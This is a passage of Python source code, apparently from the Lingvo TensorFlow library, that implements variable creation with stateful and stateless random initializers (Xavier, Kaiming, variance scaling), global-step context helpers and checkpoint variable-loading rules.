  shape = tf.TensorShape(ToStaticShape(p.shape)).as_list()
  if shape:
    # All dims must be statically known and positive.
    assert all([dim_size > 0 for dim_size in shape]), shape
    dim0 = shape[0]
  else:
    # Scalar variable: use 1 for the sqrt_dim-style scaling below.
    dim0 = 1
  assert p.init.method == 'constant' or np.all(np.asarray(p.init.scale) >= 0)
  method = p.init.method
  scale = p.init.scale
  seed = p.init.seed
  if IsDefaultParamInit(p.init):
    tf.logging.warning(
        'WARNING!!! var %s is using the default xavier initializer.'
        ' Make sure this is intended.', name)
  # Enter the scope only to compute the (possibly renamed) full variable name.
  with tf.variable_scope(name) as scope:
    var_name = GetVariableName(scope.name)
  if tf.get_default_graph().seed is not None:
    # We are in a program/test which needs deterministic randomization.
    if seed is None:
      if default_seed is not None:
        seed = default_seed
      else:
        # We are not given a per-variable random seed. We use hash of
        # variable name as a stable random seed.
        seed = GenerateSeedFromName(var_name)
  # If var_name matches a regex, then set the var_dtype; else use p.dtype.
  var_dtype = FindDataType(var_name)
  if var_dtype is None:
    var_dtype = p.dtype
  init_dtype = var_dtype.real_dtype
  # TODO(b/172827074): we do not natively support var initialization for
  # int8 type except for constant initialization.
  # NOTE: For int8, we initialize by scaling float32 random values to integer.
  if init_dtype == tf.int8:
    init_dtype = tf.float32
  v_init = _CreateVarInitStateful(name, method, shape, dim0, seed, scale,
                                  init_dtype)
  if var_dtype == tf.complex64:

    def ComplexWrapper(init):

      def _Wrapper(shape, dtype, partition_info):
        del dtype
        # A more complex alternative may be to use the init function for
        # magnitudes and uniform random for phases instead.
        shape = [2] + shape
        value = init(shape, init_dtype, partition_info)
        return tf.complex(value[0], value[1])

      return _Wrapper

    v_init = ComplexWrapper(v_init)
  if var_dtype == tf.int8:

    def FloatToInt8Wrapper(init):

      def _Wrapper(shape, dtype, partition_info):
        del dtype
        value = init(shape, init_dtype, partition_info)
        # Scale so the extreme value maps to +/-127, then round toward zero.
        scale = tf.math.maximum(
            tf.math.reduce_min(value) / -127,
            tf.math.reduce_max(value) / 127)
        value = tf.divide(value, scale)
        return tf.cast(value, tf.int8)

      return _Wrapper

    v_init = FloatToInt8Wrapper(v_init)

  # Variable creators.
  def MaybePinVarsToCpu(next_creator, **kwargs):
    if _FromGlobal('pin_vars_to_cpu'):
      with tf.device('/cpu:0'):
        return next_creator(**kwargs)
    return next_creator(**kwargs)

  def MaybeOpportunisticVariableReuse(next_creator, **kwargs):
    try:
      return next_creator(**kwargs)
    except ValueError:  # Possibly the variable already exists
      if GetOpportunisticVariableReuse():
        with tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):
          return next_creator(**kwargs)
      else:
        raise

  def LingvoVariableCreator(next_creator, **kwargs):
    """Lingvo variable creator."""
    # TODO(yonghui): Possibly get away from variable_scope and implement our
    # own variable sharing mechanism.
    with tf.variable_scope(name) as scope:
      var_scope = tf.VariableScope(
          scope.reuse,
          custom_getter=scope.custom_getter,
          caching_device=scope.caching_device,
          use_resource=True)
      with tf.variable_scope(var_scope), tf.variable_scope(
          var_name, reuse=reuse):
        var = next_creator(**kwargs)
    var_ref = var.experimental_ref()  # For key in dict/set.
    all_vars = _get_all_vars()
    if var_ref in all_vars:
      tf.logging.info('Reusing var %s', var.name)
      cached = all_vars[var_ref]
      # A reused variable must have been created with an identical config.
      assert cached == p.ToText(), ('Cached config:\n %s vs new config:\n %s' %
                                    (cached, p.ToText()))
    else:
      tf.logging.info('Creating var %s shape=%s on device %s', var.name,
                      var.shape, var.device)
      all_vars[var_ref] = p.ToText()
      for col in p.collections:
        tf.add_to_collection(col, var)
    return var

  # Creators run outermost-first: Lingvo -> opportunistic reuse -> cpu pin.
  with VariableCreatorScope(LingvoVariableCreator):
    with VariableCreatorScope(MaybeOpportunisticVariableReuse):
      with VariableCreatorScope(MaybePinVarsToCpu):
        var = _GetVariableCreator()(
            var_name=var_name,
            var_params=p,
            name='var',
            shape=GetVariableShapePrefixes() + list(shape),
            dtype=var_dtype,
            initializer=v_init,
            collections=collections,
            trainable=trainable,
            validate_shape=True,
            synchronization=synchronization,
            aggregation=aggregation)
  combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
  if combined_layers_dims > 0:
    # pylint: disable=protected-access
    var.op._set_attr('_num_leading_dims_for_combined_layers',
                     attr_value_pb2.AttrValue(i=combined_layers_dims))
  # Shard the variable according to the sharding spec.
  tensor_split_dims_mapping = p.tensor_split_dims_mapping
  if tensor_split_dims_mapping is not None:
    # Prefix dims added by VariableShapePrefixContext are not sharded.
    tensor_split_dims_mapping = ([-1] * len(GetVariableShapePrefixes()) +
                                 tensor_split_dims_mapping)
    var = gshard_utils.MeshSplit(
        var, p.device_mesh, tensor_split_dims_mapping, use_sharding_op=False)
  return var
def _CreateVariableStateless(name,
                             params,
                             reuse=None,
                             trainable=True,
                             collections=None,
                             default_seed=None,
                             synchronization=tf.VariableSynchronization.AUTO,
                             aggregation=tf.VariableAggregation.NONE):
  """Creates tf.Variable using TF stateless RNGs according to `params`.

  Args:
    name: A string, name of the variable.
    params: A WeightParams specifying the details of how this variable should
      be constructed and initialized.
    reuse: Whether or not to reuse an existing variable. It has the same
      semantics as the reuse arg in tf.variable_scope.
    trainable: Whether or not the variable is trainable.
    collections: Override the default variable collection (
      tf.GraphKeys.GLOBAL_VARIABLES).
    default_seed: Seed to use for initialization if not specified in params.
      Used for deterministic initialization in tests.
    synchronization: Indicates when a distributed a variable will be
      aggregated. Accepted values are constants defined in the class
      tf.VariableSynchronization. By default the synchronization is set to
      AUTO and the current DistributionStrategy chooses when to synchronize.
    aggregation: Indicates how a distributed variable will be aggregated.
      Accepted values are constants defined in the class
      tf.VariableAggregation.

  Returns:
    The created variable.
  """
  p = params.Copy()
  shape = tf.TensorShape(ToStaticShape(p.shape)).as_list()
  if shape:
    # All dims must be statically known and positive.
    assert all([dim_size > 0 for dim_size in shape]), shape
    dim0 = shape[0]
  else:
    # Scalar variable: use 1 for the sqrt_dim-style scaling below.
    dim0 = 1
  assert p.init.method == 'constant' or np.all(np.asarray(p.init.scale) >= 0)
  method = p.init.method
  scale = p.init.scale
  seed = p.init.seed
  if IsDefaultParamInit(p.init):
    tf.logging.warning(
        'WARNING!!! var %s is using the default xavier initializer.'
        ' Make sure this is intended.', name)
  # Enter the scope only to compute the (possibly renamed) full variable name.
  with tf.variable_scope(name) as scope:
    var_name = GetVariableName(scope.name)
  # Stateless RNGs always need a 2-tuple seed; derive the second element from
  # the variable name so distinct variables get distinct values.
  user_seed = seed if seed is not None else default_seed
  seed = _GenerateStatelessRngSeed(var_name, user_seed)
  # If var_name matches a regex, then set the var_dtype; else use p.dtype.
  var_dtype = FindDataType(var_name)
  if var_dtype is None:
    var_dtype = p.dtype
  init_dtype = var_dtype.real_dtype
  v_init = _CreateVarInitStateless(name, method, shape, dim0, seed, scale,
                                   init_dtype)
  if var_dtype == tf.complex64:
    raise TypeError(
        'Stateless variable initialization does not support tf.complex64.')

  def LingvoVariableCreator(next_creator, **kwargs):
    """Lingvo variable creator."""
    # TODO(yonghui): Possibly get away from variable_scope and implement our
    # own variable sharing mechanism.
    with tf.variable_scope(name) as scope:
      var_scope = tf.VariableScope(
          scope.reuse,
          custom_getter=scope.custom_getter,
          caching_device=scope.caching_device,
          use_resource=True)
      with tf.variable_scope(var_scope), tf.variable_scope(
          var_name, reuse=reuse):
        var = next_creator(**kwargs)
    var_ref = var.experimental_ref()  # For key in dict/set.
    all_vars = _get_all_vars()
    if var_ref in all_vars:
      tf.logging.info('Reusing var %s', var.name)
      cached = all_vars[var_ref]
      # A reused variable must have been created with an identical config.
      assert cached == p.ToText(), ('Cached config:\n %s vs new config:\n %s' %
                                    (cached, p.ToText()))
    else:
      tf.logging.info('Creating var %s shape=%s on device %s', var.name,
                      var.shape, var.device)
      all_vars[var_ref] = p.ToText()
      for col in p.collections:
        tf.add_to_collection(col, var)
    return var

  with VariableCreatorScope(LingvoVariableCreator):
    var = _GetVariableCreator()(
        var_name=var_name,
        var_params=p,
        name='var',
        shape=GetVariableShapePrefixes() + list(shape),
        dtype=var_dtype,
        initializer=v_init,
        collections=collections,
        trainable=trainable,
        validate_shape=True,
        synchronization=synchronization,
        aggregation=aggregation)
  combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
  if combined_layers_dims > 0:
    # pylint: disable=protected-access
    var.op._set_attr('_num_leading_dims_for_combined_layers',
                     attr_value_pb2.AttrValue(i=combined_layers_dims))
  # Shard the variable according to the sharding spec.
  tensor_split_dims_mapping = p.tensor_split_dims_mapping
  if tensor_split_dims_mapping is not None:
    # Prefix dims added by VariableShapePrefixContext are not sharded.
    tensor_split_dims_mapping = ([-1] * len(GetVariableShapePrefixes()) +
                                 tensor_split_dims_mapping)
    var = gshard_utils.MeshSplit(
        var, p.device_mesh, tensor_split_dims_mapping, use_sharding_op=False)
  return var
def _RandomXavierUniformInitializer(method, scale, seed):
  """Creates a random Xavier uniform initializer.

  Args:
    method: One of 'xavier' or 'geo_mean_xavier'.
    scale: Multiplier applied to the sampled values.
    seed: Seed for tf.random.uniform.

  Returns:
    An initializer function (shape, dtype, partition_info) -> tf.Tensor.
  """
  # Capture at factory time; the closure may run outside the context.
  combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()

  def XavierUniform(shape, dtype, partition_info):
    """Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
    del partition_info  # Unused.
    if not shape:
      raise ValueError('\'shape\' must not be \'None\' or 0 for XavierUniform')
    fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
    if method == 'xavier':
      limit = math.sqrt(6. / (fan_in + fan_out))
    elif method == 'geo_mean_xavier':
      limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
    else:
      # Previously an unrecognized method fell through to a NameError on
      # `limit`; raise a clear error instead.
      raise ValueError('Unsupported Xavier method: %s' % method)
    return scale * tf.random.uniform(shape, -limit, limit, dtype, seed)

  return XavierUniform
def _CreateVarInitStateful(name, method, shape, dim0, seed, scale, init_dtype):
  """Creates variable initialization function for a stateful RNG.

  Args:
    name: Variable name; used only for warning messages.
    method: Initialization method string (e.g. 'gaussian', 'xavier', ...).
    shape: Static shape of the variable, as a list of ints.
    dim0: shape[0] if shape is non-empty, else 1; used by *_sqrt_dim methods.
    seed: Random seed, or None.
    scale: Scale (or constant value) for the initializer.
    init_dtype: Data type used for random value generation.

  Returns:
    An initializer accepted by tf.get_variable.
  """
  if (method in [
      'gaussian_sqrt_dim', 'uniform_sqrt_dim', 'truncated_gaussian_sqrt_dim'
  ]):
    if len(shape) > 2:
      # This is probably not the right method to use when len(shape) > 2,
      # e.g. dim0 will be 3 with a 3x3 conv2d kernel.
      tf.logging.warning(
          'Initializing %s of shape %s with method %s: dim0=%s. '
          'Make sure that it is intended.', name, shape, method, dim0)
    scale *= 1.0 / math.sqrt(dim0)

  combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
  if method in ['gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanin']:
    fan_in, _ = GetFanInFanOut(shape, combined_layers_dims)
    if fan_in is not None:
      scale *= 1.0 / math.sqrt(fan_in)
  if method in ['gaussian_sqrt_fanout', 'truncated_gaussian_sqrt_fanout']:
    _, fan_out = GetFanInFanOut(shape, combined_layers_dims)
    if fan_out is not None:
      scale *= 1.0 / math.sqrt(fan_out)
  if method in ['gaussian_sqrt_fanavg']:
    fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
    if fan_in is not None and fan_out is not None:
      scale *= math.sqrt(2.0 / (fan_in + fan_out))

  if method in [
      'gaussian', 'gaussian_sqrt_dim', 'gaussian_sqrt_fanin',
      'gaussian_sqrt_fanout', 'gaussian_sqrt_fanavg'
  ]:
    v_init = init_ops.random_normal_initializer(
        mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
  elif method in ['uniform', 'uniform_sqrt_dim']:
    v_init = init_ops.random_uniform_initializer(
        minval=-scale, maxval=scale, seed=seed, dtype=init_dtype)
  elif method in ['uniform_positive']:
    v_init = init_ops.random_uniform_initializer(
        minval=0.0, maxval=scale, seed=seed, dtype=init_dtype)
  elif method == 'category':
    # Uniform integer categories in [0, scale), via floor of a uniform float.
    uniform_init = init_ops.random_uniform_initializer(
        minval=0.0, maxval=scale, seed=seed, dtype=init_dtype)
    v_init = lambda *args, **kwargs: tf.floor(uniform_init(*args, **kwargs))
  elif method in ['uniform_unit_scaling']:
    v_init = init_ops.uniform_unit_scaling_initializer(
        factor=scale, seed=seed, dtype=init_dtype)
  elif method in ['uniform_unit_scaling_fan_avg']:
    v_init = tf.variance_scaling_initializer(
        scale=scale,
        mode='fan_avg',
        distribution='uniform',
        seed=seed,
        dtype=init_dtype)
  elif method in [
      'truncated_gaussian', 'truncated_gaussian_sqrt_dim',
      'truncated_gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanout'
  ]:
    v_init = init_ops.truncated_normal_initializer(
        mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
  elif method in ['constant']:
    v_init = init_ops.constant_initializer(value=scale, dtype=init_dtype)
  elif method in ['xavier', 'geo_mean_xavier']:
    # Delegate to the shared helper for consistency with
    # _CreateVarInitStateless (which uses the deterministic equivalent); the
    # inline closure previously here duplicated that helper verbatim.
    v_init = _RandomXavierUniformInitializer(method, scale, seed)
  elif method in [
      'kaiming_uniform_fanin_relu', 'kaiming_uniform_fanin_leakyrelu'
  ]:
    fan_in = np.prod(shape[:-1])
    if method == 'kaiming_uniform_fanin_leakyrelu':
      # Assume the 'a' parameter is the 'scale' argument.
      gain = np.sqrt(2. / (1 + scale**2))
    else:
      gain = np.sqrt(2.)
    std_dev = gain / np.sqrt(fan_in)
    bound = np.sqrt(3.0) * std_dev
    v_init = init_ops.random_uniform_initializer(
        minval=-bound, maxval=bound, seed=seed, dtype=init_dtype)
  else:
    assert False, 'init_type `%s` not supported.' % method
  return v_init
def _GenerateStatelessRngSeed(name, seed):
  """Generates a 2-tuple seed for a stateless variable initializer.

  We want to ensure that different variables end up with different random
  values even when they are passed the same seed and shape. To this aim, this
  function generates a pseudo-unique seed by hashing the variable name and
  mapping it into a scalar seed. More specifically, the returned value is a
  2-tuple of tf.int32 scalar, where the first element is the user-provided
  seed and the second element is obtained by hashing the variable name.

  Args:
    name: The variable name for which to generate a stateless-like seed.
    seed: The user-specified scalar seed.

  Returns:
    A 2-tuple seed of tf.int32 values (for TPU compatibility).
  """
  user_seed = seed or 0  # None -> 0.
  name_seed = GenerateSeedFromName(name)
  return tf.constant([user_seed, name_seed], dtype=tf.int32)
def _DeterministicRandomNormalInitializer(seed, mean, stddev):
  """Creates a random normal initializer.

  Args:
    seed: 2-tuple seed for the stateless RNG.
    mean: Mean of the normal distribution.
    stddev: Standard deviation of the normal distribution.

  Returns:
    An initializer function (shape, dtype, partition_info) -> tf.Tensor.
  """

  def DeterministicNormal(shape, dtype, partition_info):
    del partition_info  # Unused.
    return stateless_random_ops.stateless_random_normal(
        shape=shape, seed=seed, mean=mean, stddev=stddev, dtype=dtype)

  return DeterministicNormal
def _DeterministicRandomUniformInitializer(seed, minval, maxval):
  """Creates a random uniform initializer.

  Args:
    seed: 2-tuple seed for the stateless RNG.
    minval: Lower bound of the uniform distribution.
    maxval: Upper bound of the uniform distribution.

  Returns:
    An initializer function (shape, dtype, partition_info) -> tf.Tensor.
  """

  def DeterministicUniform(shape, dtype, partition_info):
    del partition_info  # Unused.
    return stateless_random_ops.stateless_random_uniform(
        shape=shape, seed=seed, minval=minval, maxval=maxval, dtype=dtype)

  return DeterministicUniform
def _DeterministicRandomTruncatedNormalInitializer(seed, mean, stddev):
  """Creates a random truncated normal initializer.

  Args:
    seed: 2-tuple seed for the stateless RNG.
    mean: Mean of the (pre-truncation) normal distribution.
    stddev: Standard deviation of the (pre-truncation) normal distribution.

  Returns:
    An initializer function (shape, dtype, partition_info) -> tf.Tensor.
  """

  def DeterministicTruncatedNormal(shape, dtype, partition_info):
    del partition_info  # Unused.
    return stateless_random_ops.stateless_truncated_normal(
        shape=shape, seed=seed, mean=mean, stddev=stddev, dtype=dtype)

  return DeterministicTruncatedNormal
def _DeterministicRandomUniformUnitScalingInitializer(seed, factor):
  """Creates a random uniform unit scaling initializer.

  Args:
    seed: 2-tuple seed for the stateless RNG.
    factor: Scaling factor applied to the sampling bound.

  Returns:
    An initializer function (shape, dtype, partition_info) -> tf.Tensor.
  """

  def DeterministicUniformUnitScaling(shape, dtype, partition_info):
    # The following logic is originally from (UniformUnitScaling.__call__())
    # in TensorFlow: python/ops/init_ops.py
    scale_shape = shape
    if partition_info is not None:
      scale_shape = partition_info.full_shape
    input_size = 1.0
    # Estimating input size is not possible to do perfectly, but we try.
    # The estimate, obtained by multiplying all dimensions but the last one,
    # is the right thing for matrix multiply and convolutions (see above).
    for dim in scale_shape[:-1]:
      input_size *= float(dim)
    # Avoid errors when initializing zero-size tensors.
    input_size = max(input_size, 1.0)
    maxval = math.sqrt(3 / input_size) * factor
    return stateless_random_ops.stateless_random_uniform(
        shape=shape, seed=seed, minval=-maxval, maxval=maxval, dtype=dtype)

  return DeterministicUniformUnitScaling
def _DeterministicRandomVarianceScalingInitializer(scale, mode, distribution,
                                                   seed):
  """Creates a variance scaling initializer.

  Args:
    scale: Positive float scaling factor for the variance.
    mode: One of 'fan_in', 'fan_out', 'fan_avg'.
    distribution: One of 'normal', 'uniform', 'truncated_normal',
      'untruncated_normal' (case-insensitive).
    seed: 2-tuple seed for the stateless RNG.

  Returns:
    An initializer function (shape, dtype, partition_info) -> tf.Tensor.

  Raises:
    ValueError: If scale, mode or distribution is invalid.
  """
  if scale <= 0.:
    raise ValueError('`scale` must be positive float.')
  if mode not in {'fan_in', 'fan_out', 'fan_avg'}:
    raise ValueError('Invalid `mode` argument:', mode)
  distribution = distribution.lower()
  if distribution not in {
      'normal', 'uniform', 'truncated_normal', 'untruncated_normal'
  }:
    raise ValueError('Invalid `distribution` argument:', distribution)
  # Capture at factory time; the closure may run outside the context.
  combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()

  def DeterministicVarianceScaling(shape, dtype, partition_info):
    # This is originally from TensorFlow: python/ops/init_ops.py
    scale_shape = shape
    if partition_info is not None:
      scale_shape = partition_info.full_shape
    # Handle special case of empty list as shape, since fan_in and fan_out
    # are numerically added below. Without this, GetFanInFanOut() would
    # return None, None instead.
    if isinstance(scale_shape, (list, tuple)) and not scale_shape:
      fan_in, fan_out = 1, 1
    else:
      fan_in, fan_out = GetFanInFanOut(scale_shape, combined_layers_dims)
    if mode == 'fan_in':
      scale_inner = scale / max(1., fan_in)
    elif mode == 'fan_out':
      scale_inner = scale / max(1., fan_out)
    else:
      scale_inner = scale / max(1., (fan_in + fan_out) / 2.)
    if distribution == 'normal' or distribution == 'truncated_normal':
      # constant taken from scipy.stats.truncnorm.std(
      # a=-2, b=2, loc=0., scale=1.)
      stddev = math.sqrt(scale_inner) / .87962566103423978
      return stateless_random_ops.stateless_truncated_normal(
          shape=shape, seed=seed, mean=0.0, stddev=stddev, dtype=dtype)
    elif distribution == 'untruncated_normal':
      stddev = math.sqrt(scale_inner)
      return stateless_random_ops.stateless_random_normal(
          shape=shape, seed=seed, mean=0.0, stddev=stddev, dtype=dtype)
    else:
      limit = math.sqrt(3.0 * scale_inner)
      return stateless_random_ops.stateless_random_uniform(
          shape=shape, seed=seed, minval=-limit, maxval=limit, dtype=dtype)

  return DeterministicVarianceScaling
def _DeterministicRandomXavierUniformInitializer(method, scale, seed):
  """Creates a deterministic (stateless-RNG) Xavier uniform initializer.

  (The previous docstring, "Creates a variance scaling initializer", was a
  copy-paste from the function above.)

  Args:
    method: One of 'xavier' or 'geo_mean_xavier'.
    scale: Multiplier applied to the sampled values.
    seed: 2-tuple seed for the stateless RNG.

  Returns:
    An initializer function (shape, dtype, partition_info) -> tf.Tensor.
  """
  # Capture at factory time; the closure may run outside the context.
  combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()

  def XavierUniform(shape, dtype, partition_info):
    """Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
    del partition_info  # Unused.
    if not shape:
      raise ValueError('\'shape\' must not be \'None\' or 0 for XavierUniform')
    fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
    if method == 'xavier':
      limit = math.sqrt(6. / (fan_in + fan_out))
    elif method == 'geo_mean_xavier':
      limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
    else:
      # Previously an unrecognized method fell through to a NameError on
      # `limit`; raise a clear error instead.
      raise ValueError('Unsupported Xavier method: %s' % method)
    return scale * stateless_random_ops.stateless_random_uniform(
        shape, seed, -limit, limit, dtype)

  return XavierUniform
def _CreateVarInitStateless(name, method, shape, dim0, seed, scale, init_dtype):
  """Creates variable initialization function for a stateless RNG.

  Args:
    name: Variable name; used only for warning messages.
    method: Initialization method string (e.g. 'gaussian', 'xavier', ...).
    shape: Static shape of the variable, as a list of ints.
    dim0: shape[0] if shape is non-empty, else 1; used by *_sqrt_dim methods.
    seed: 2-tuple seed for the stateless RNG.
    scale: Scale (or constant value) for the initializer.
    init_dtype: Data type used for random value generation.

  Returns:
    An initializer accepted by tf.get_variable.
  """
  if (method in [
      'gaussian_sqrt_dim', 'uniform_sqrt_dim', 'truncated_gaussian_sqrt_dim'
  ]):
    if len(shape) > 2:
      # This is probably not the right method to use when len(shape) > 2,
      # e.g. dim0 will be 3 with a 3x3 conv2d kernel.
      tf.logging.warning(
          'Initializing %s of shape %s with method %s: dim0=%s. '
          'Make sure that it is intended.', name, shape, method, dim0)
    scale *= 1.0 / math.sqrt(dim0)

  combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
  if method in ['gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanin']:
    fan_in, _ = GetFanInFanOut(shape, combined_layers_dims)
    if fan_in is not None:
      scale *= 1.0 / math.sqrt(fan_in)
  if method in ['gaussian_sqrt_fanout', 'truncated_gaussian_sqrt_fanout']:
    _, fan_out = GetFanInFanOut(shape, combined_layers_dims)
    if fan_out is not None:
      scale *= 1.0 / math.sqrt(fan_out)
  if method in ['gaussian_sqrt_fanavg']:
    fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
    if fan_in is not None and fan_out is not None:
      scale *= math.sqrt(2.0 / (fan_in + fan_out))

  if method in [
      'gaussian', 'gaussian_sqrt_dim', 'gaussian_sqrt_fanin',
      'gaussian_sqrt_fanout', 'gaussian_sqrt_fanavg'
  ]:
    v_init = _DeterministicRandomNormalInitializer(
        seed=seed, mean=0., stddev=scale)
  elif method in ['uniform', 'uniform_sqrt_dim']:
    v_init = _DeterministicRandomUniformInitializer(
        seed=seed, minval=-scale, maxval=scale)
  elif method in ['uniform_positive']:
    v_init = _DeterministicRandomUniformInitializer(
        seed=seed, minval=0., maxval=scale)
  elif method == 'category':
    # Mirrors the 'category' branch of _CreateVarInitStateful, which was
    # previously missing here and fell through to the assert below.
    uniform_init = _DeterministicRandomUniformInitializer(
        seed=seed, minval=0., maxval=scale)
    v_init = lambda *args, **kwargs: tf.floor(uniform_init(*args, **kwargs))
  elif method in ['uniform_unit_scaling']:
    v_init = _DeterministicRandomUniformUnitScalingInitializer(
        seed=seed, factor=scale)
  elif method in ['uniform_unit_scaling_fan_avg']:
    v_init = _DeterministicRandomVarianceScalingInitializer(
        scale=scale, mode='fan_avg', distribution='uniform', seed=seed)
  elif method in [
      'truncated_gaussian', 'truncated_gaussian_sqrt_dim',
      'truncated_gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanout'
  ]:
    v_init = _DeterministicRandomTruncatedNormalInitializer(
        seed=seed, mean=0., stddev=scale)
  elif method in ['constant']:
    v_init = init_ops.constant_initializer(value=scale, dtype=init_dtype)
  elif method in ['xavier', 'geo_mean_xavier']:
    v_init = _DeterministicRandomXavierUniformInitializer(method, scale, seed)
  elif method in [
      'kaiming_uniform_fanin_relu', 'kaiming_uniform_fanin_leakyrelu'
  ]:
    fan_in = np.prod(shape[:-1])
    if method == 'kaiming_uniform_fanin_leakyrelu':
      # Assume the 'a' parameter is the 'scale' argument.
      gain = np.sqrt(2. / (1 + scale**2))
    else:
      gain = np.sqrt(2.)
    std_dev = gain / np.sqrt(fan_in)
    bound = np.sqrt(3.0) * std_dev
    v_init = _DeterministicRandomUniformInitializer(
        seed=seed, minval=-bound, maxval=bound)
  else:
    assert False, 'init_type %s not supported.' % method
  return v_init
_global_variable_scope = None
def GetGlobalVariableScope():
  """Gets the global variable scope (as if no variable_scope has been set).

  Returns:
    The VariableScope corresponding to as if no tf.variable_scope is in effect.
  """
  if not _global_variable_scope:
    # Each thread gets its own default global variable scope, and we take
    # advantage of that in order to get a top-level scope. This avoids the
    # need to call tf.get_variable_scope() at the module level, which allows
    # this module to be imported without modifying global state (i.e. creating
    # the default graph). It is important to not mutate the global state at
    # module load time, because it let's us flip flags after import that affect
    # core TensorFlow behavior.
    def Initialize():
      global _global_variable_scope
      _global_variable_scope = tf.get_variable_scope()

    # Run Initialize() on a fresh thread: that thread's default scope is
    # pristine, regardless of any variable_scope the caller is inside.
    t = threading.Thread(target=Initialize)
    t.start()
    t.join()
  return _global_variable_scope
# Thread-local stack of global_step tensors, pushed/popped by
# GlobalStepContext() and read by GetGlobalStep().
_GLOBAL_STEP_STACK = ThreadLocalStack()
@contextlib.contextmanager
def GlobalStepContext(global_step_tensor):
  """Makes `global_step_tensor` the result of GetGlobalStep() in this scope."""
  _GLOBAL_STEP_STACK.stack.append(global_step_tensor)
  try:
    yield
  finally:
    # Always pop, even when the body raises, to keep the stack balanced.
    _GLOBAL_STEP_STACK.stack.pop()
def GetGlobalStep():
  """Return the global_step."""
  # Prefer the innermost GlobalStepContext override, if any.
  stack = _GLOBAL_STEP_STACK.stack
  if not stack:
    return tf.train.get_global_step()
  return stack[-1]
def GetOrCreateGlobalStepVar():
  """Return the global_step variable, creating it if it does not exist.

  Prefer GetGlobalStep if a tensor rather than a tf.Variable is sufficient.

  Returns:
    The global_step variable, or a new created one if it does not exist.
  """
  # Create/fetch the variable under the top-level scope so the same variable
  # is shared no matter what variable_scope the caller is currently inside.
  with tf.variable_scope(GetGlobalVariableScope(), use_resource=True):
    if _FromGlobal('pin_vars_to_cpu'):
      with tf.device('/cpu:0'):
        return tf.train.get_or_create_global_step()
    else:
      return tf.train.get_or_create_global_step()
def LogMultiLines(label, lines):
  """Logs each line of `lines` (a string or list/tuple), prefixed by `label`."""
  if isinstance(lines, (list, tuple)):
    entries = lines
  else:
    entries = lines.split('\n')
  for entry in entries:
    tf.logging.info('%s: %s', label, entry)
def _LogPlacement(label, theta, copy):
  """Logs theta and its copy's device placement."""

  def GetDevices(m):
    """Flatten a `.NestedMap` m and extracts each value's device."""
    return [x.device for x in m.Flatten()]

  tf.logging.info('=== %s ===', label)
  # Log one 'original_device -> copy_device' line per entry, packed back into
  # theta's structure so keys appear in the debug string.
  LogMultiLines(
      label,
      theta.Pack([('%s -> %s' % (x[0], x[1]))
                  for x in zip(GetDevices(theta), GetDevices(copy))
                 ]).DebugString())
  tf.logging.info('==========')
def CreateLocalTheta(theta, device_list=None, label=None):
  """Creates local copy of theta and shards across devices device list.

  Leaves variables intact.

  Args:
    theta: a `.NestedMap` of variables.
    device_list: list of devices to shard across. If None, defaults to a list
      [''].
    label: Logging label.

  Returns:
    A `.NestedMap` of identity() wrapped theta
  """

  class AddIdentity:
    """Helper class."""

    def __init__(self, device_list):
      self._list = device_list if device_list else ['']
      self._index = 0

    def __call__(self, x):
      if isinstance(x, tf.Variable):
        # Variables are left intact; only plain tensors get copied.
        return x
      # Round-robin over the device list, one device per tensor.
      with tf.device(self._list[self._index % len(self._list)]):
        self._index += 1
        return tf.identity(x)

  copy = theta.Transform(AddIdentity(device_list))
  _LogPlacement(label, theta, copy)
  return copy
def _GetVarsToLoad(all_vars, variable_loading_rules, var_ignore_rules,
                   ckpt_path):
  """Determines variables to load and their names in checkpoint.

  Args:
    all_vars: list of model variables.
    variable_loading_rules: list of (regexp, name_format) string pairs; the
      first regexp matching a model var's name determines its checkpoint name
      via name_format % match.groups().
    var_ignore_rules: list of regexps; model vars matching any are skipped.
    ckpt_path: checkpoint path, used only for logging.

  Returns:
    A list of (checkpoint_var_name, model_var) pairs.
  """
  # This list contains mappings from var names as they appear in the checkpoint
  # to the vars in our model they correspond to.
  vars_to_load = []
  for model_var in all_vars:
    loaded = False
    for regexp, name_format in variable_loading_rules:
      match = re.match(regexp, model_var.name)
      # Skip if var doesn't match the loading rules, or if it should be ignored.
      if not match:
        tf.logging.debug('Loading rules do not match %s.', model_var.name)
        continue
      elif any(re.match(r, model_var.name) for r in var_ignore_rules):
        tf.logging.debug('Ignoring %s from loading.', model_var.name)
        continue
      checkpoint_var_name = name_format % match.groups()
      # Checkpoint keys never carry the ':0' tensor-output suffix.
      if checkpoint_var_name.endswith(':0'):
        checkpoint_var_name = checkpoint_var_name[:-2]
      tf.logging.info('Loading %s from %s with regexp: %s', model_var.name,
                      checkpoint_var_name, regexp)
      vars_to_load.append((checkpoint_var_name, model_var))
      loaded = True
      # Only the first matching rule applies to a given var.
      break
    if not loaded:
      tf.logging.info(
          'Not loading model variable %s from %s as it does not match any rules'
          ' or matches ignored', model_var.name, ckpt_path)
  return vars_to_load
def OverrideVarsFromCheckpoint(all_vars, checkpoint_path,
                               variable_loading_rules, var_ignore_rules):
  """Add TF graph ops to override variables from a provided checkpoint.

  Args:
    all_vars: List of all the parameters in the model.
    checkpoint_path: A path to the checkpoints of a pretrained model.
    variable_loading_rules: A list of tuples of strings defining (regex to match
      parameter names in the model to override, format string to determine the
      corresponding var in the checkpoint).
